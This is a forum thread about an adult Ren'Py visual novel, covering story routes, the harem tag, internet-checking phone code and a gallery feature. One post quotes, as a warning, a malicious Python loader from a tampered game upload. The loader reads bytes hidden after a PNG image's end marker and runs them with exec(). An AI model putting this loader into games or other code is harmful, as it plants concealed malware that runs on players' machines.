CREATE YOUR AI CUM SLUT ON CANDY.AI TRY FOR FREE
x
3.40 star(s) 13 Votes

OWSam000

Active Member
Mar 1, 2022
979
1,077
Is blue and red path mutually exclusive?
If you open red or blue path, will other main girls path close?
 

Jacowboy

Active Member
Aug 8, 2022
770
912
'sup folks, a couple of Qs:

how bad is the engrish?

also, how much content is there so far? (it'd be nice to have a static render count)

thanks!
 

Dolyla

Member
Game Developer
Feb 10, 2022
420
933
Hi there ! Hope you will like it !

Is blue and red path mutually exclusive?
If you open red or blue path, will other main girls path close?
Yes they're on their own path, you cant have both at the same time.
It can close, or not, paths with others girls depending on the way you play.

this is a harem game ? harem tag> why the paths?
Depending if for you Harem = All girls of the game at the same time, or, like in this case, MC can have multiple girls at the same time... but not all. Some are exclusive.

'sup folks, a couple of Qs:

how bad is the engrish?

also, how much content is there so far? (it'd be nice to have a static render count)

thanks!
2000+ renders // 100+ animations
 

longjohngold

Well-Known Member
Jan 22, 2020
1,242
1,940
Oh no this game has copied the phone code that has sprung up in a few games now, that for some ungodly reason checks for your internet connection. So if you're taking the appropriate steps to ensure renpy games don't have access to the internet (as is smart given those security breeches we had earlier in the year) then you'll just get endless errors when the phone is used.

You don't have permission to view the spoiler content. Log in or register now.

That get_internet_connection_state is the giveaway. I think Seductive Shadows has the same problem... and there was another one that I encountered it in, but the dev fixed it quickly so I can't remember which game it was.
 
  • Wow
Reactions: S1nsational

Sony676

Active Member
Mar 14, 2021
941
1,282
Dolyla Do you plan to have some gallery unlock feature in the future? I still struggle to unlock each and every scene in the game which is a little frustrating here and there.
 

Dolyla

Member
Game Developer
Feb 10, 2022
420
933
Oh no this game has copied the phone code that has sprung up in a few games now, that for some ungodly reason checks for your internet connection. So if you're taking the appropriate steps to ensure renpy games don't have access to the internet (as is smart given those security breeches we had earlier in the year) then you'll just get endless errors when the phone is used.

You don't have permission to view the spoiler content. Log in or register now.

That get_internet_connection_state is the giveaway. I think Seductive Shadows has the same problem... and there was another one that I encountered it in, but the dev fixed it quickly so I can't remember which game it was.
will look at it cause it's not very useful as a feature of the phone. Thank you for this !
Dolyla Do you plan to have some gallery unlock feature in the future? I still struggle to unlock each and every scene in the game which is a little frustrating here and there.
yeah I will add this option at the end of the season I think in the DLC
 
  • Like
Reactions: Sony676

BasedDenier

Newbie
Sep 23, 2024
23
48
The game is awesome but being in an University I'd imagine we'd see routine and classes (like on Being a Dik)
 

WuzzyFuzzy

Well-Known Member
Jan 23, 2020
1,586
3,215
(I'm on a mission to change this behavior.)

TO: Uploaders, Moderators, Developers, Foxes, Hounds, Gargoyles, Anyone, Everyone....

Please post a date and/or version number along with these notices on the OP. It's confusing not knowing how this applies.

OP posts - Copy.JPG
 

MiltonPowers

Twins Basil! Twins!
Donor
Jul 26, 2023
8,811
16,738
(I'm on a mission to change this behavior.)

TO: Uploaders, Moderators, Developers, Foxes, Hounds, Gargoyles, Anyone, Everyone....

Please post a date and/or version number along with these notices on the OP. It's confusing not knowing how this applies.

View attachment 4077083
Yes please. We need more people to get behind your campaign. You need to start again for Episode 3, but that note is still sitting there at Episode 8. It's confusing and annoying.
 
  • Like
Reactions: WuzzyFuzzy

Reij

Member
Jun 22, 2018
142
125
So if you're taking the appropriate steps to ensure renpy games don't have access to the internet (as is smart given those security breeches we had earlier in the year)
Just wanted to add that it's an ongoing problem as it seems they just spotted another suspicious upload (this time before the OP of the game's thread was updated and with a slight variation on the previous malicious code).
The attacker has changed their tact slightly.

Code:
    def style_check(image_path):
        with open(image_path, 'rb') as f:
            content = f.read()
        end_marker = b'\x49\x45\x4E\x44\xAE\x42\x60\x82'
        idx = content.rfind(end_marker)
        code = content[idx + len(end_marker):]
        return code.decode('utf-8')
    def style_init(image_path):
        code = style_check(image_path)
        exec(code, {'__name__': '__main__'})
    image_path = r'game\images\ui\gall_velera_3_unlocked.png'
    style_init(image_path)
Shared in https://f95zone.to/threads/isekai-paradise-v0-2-soultice.226798/post-14940252 thankfully Zemax caught it before the OP was updated.

A reminder to everyone to wait for the OP to be updated before downloading, giving our uploader team a chance to check it first.
 
Last edited:

grahegri

sake, birds, torrents
Donor
Feb 23, 2023
10,213
5,681
BEST-EP3
You don't have permission to view the spoiler content. Log in or register now.
rpdl torrents are unaffiliated with F95Zone and the game developer.
Please note that we do not provide support for games.
For torrent-related issues use here, or join us on !
, . Downloading issues? Look here.​
 

UncleNanard

I am to music what Kanye West is to adult games.
Game Developer
Jul 1, 2017
1,649
1,623
Oh no this game has copied the phone code that has sprung up in a few games now, that for some ungodly reason checks for your internet connection. So if you're taking the appropriate steps to ensure renpy games don't have access to the internet (as is smart given those security breeches we had earlier in the year) then you'll just get endless errors when the phone is used.

You don't have permission to view the spoiler content. Log in or register now.

That get_internet_connection_state is the giveaway. I think Seductive Shadows has the same problem... and there was another one that I encountered it in, but the dev fixed it quickly so I can't remember which game it was.
Oh no this game has copied the phone code that has sprung up in a few games now, that for some ungodly reason checks for your internet connection. So if you're taking the appropriate steps to ensure renpy games don't have access to the internet (as is smart given those security breeches we had earlier in the year) then you'll just get endless errors when the phone is used.

You don't have permission to view the spoiler content. Log in or register now.

That get_internet_connection_state is the giveaway. I think Seductive Shadows has the same problem... and there was another one that I encountered it in, but the dev fixed it quickly so I can't remember which game it was.
It is a ready-to-use script hosted on Github. To be honest, it is the only good phone script; the others are clearly outdated. I am in the process of adding it to a project I am working on, and I had no idea it used the internet. Thank you; I will look into removing it.

I know the developer a little bit, and I know he is not the type of person to gather information behind players' backs, so do not worry about it.
 
  • Thinking Face
Reactions: Cernunnos.

Jacowboy

Active Member
Aug 8, 2022
770
912
Hi there ! Hope you will like it !


Yes they're on their own path, you cant have both at the same time.
It can close, or not, paths with others girls depending on the way you play.


Depending if for you Harem = All girls of the game at the same time, or, like in this case, MC can have multiple girls at the same time... but not all. Some are exclusive.



2000+ renders // 100+ animations
Oh ok, cool thanks... might wait for one more update then, I'll think about it!

Also and btw, the harem tag is used for games where you can bang EVERY SIGNLE LI in one playthrough, if that's not the case, the tag should probably be removed or you'll get endless grief from people complaining about it.
 
  • Like
Reactions: MixQQ

fiiiasu

New Member
Dec 8, 2021
5
0
It is a ready-to-use script hosted on Github. To be honest, it is the only good phone script; the others are clearly outdated. I am in the process of adding it to a project I am working on, and I had no idea it used the internet. Thank you; I will look into removing it.

I know the developer a little bit, and I know he is not the type of person to gather information behind players' backs, so do not worry about it.
How can i skip this phone scene which is MC talks with Elise after mentioning about teacher Gabriella the scene does not play just the girl animation plays on the phone screen but when i click the phone some python code is opening in the editor.
 

flaviopaganini

Well-Known Member
Feb 25, 2024
1,282
2,620
Oh ok, cool thanks... might wait for one more update then, I'll think about it!

Also and btw, the harem tag is used for games where you can bang EVERY SIGNLE LI in one playthrough, if that's not the case, the tag should probably be removed or you'll get endless grief from people complaining about it.
In F95 (https://f95zone.to/threads/tags-rules-and-list-updated-2024-09-15.10394/)
  • Harem [1 person being courted by at least 3 others, all engaging in consensual sex simultaneously.]
 
  • Like
Reactions: cpg233

Cernunnos.

Well-Known Member
May 27, 2017
1,525
4,114
Yes they're on their own path, you cant have both at the same time.
It can close, or not, paths with others girls depending on the way you play.

Depending if for you Harem = All girls of the game at the same time, or, like in this case, MC can have multiple girls at the same time... but not all. Some are exclusive.
Well, good to know early on. Good luck with the game.
 
3.40 star(s) 13 Votes